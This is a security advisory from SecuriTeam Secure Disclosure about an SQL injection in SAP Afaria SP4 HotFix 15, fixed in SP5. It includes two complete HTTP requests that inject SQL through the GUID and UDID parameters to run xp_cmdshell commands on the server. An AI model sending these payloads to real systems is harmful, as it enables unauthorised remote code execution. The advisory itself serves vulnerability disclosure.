SSD Advisory – SAP Afaria SQL Injection

Vulnerabilities Summary
The following advisory describes an SQL injection vulnerabilities in the SAP Afaria Service Pack 4 HotFix 15 that can lead to execute arbitrary code.
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
Vendor Responses
SAP Afaria has released patch to address the vulnerability – SP5

Vulnerability Details
When Afaria installed on mobile device, the user is given an “enrollment code” which is used to identify the relay server. This enrollment code is a URI on tinyurl that redirects to the relay server so that users do not have to type in the https://FQDN/path.
The following two HTTP requests can be used to trigger the SQL injection and call the MS SQL Server’s xp_cmdshell command and cause the SQL server to execute arbitrary code.
Command Injection #1

GET /ias_relay_server/client/rs_client.dll/mdm-es/devauth/aipService.svc/StartEnrollment?GUID=GUID';CALL%20xp_cmdshell('INJECT_COMMAND');-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive

Command Injection #2

GET /ias_relay_server/client/rs_client.dll/mdm-es/devunauth/aipService.svc/GetClientBrandingData?UDID=UDID';CALL%20xp_cmdshell('INJECT_COMMAND');--&TenantID=0&ImageType=iPad1G HTTP/1.1
Host: example.com:443
User-Agent: Afaria iPhone Client
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Cookie: ias-rs-sessionid="cookie"
Connection: keep-alive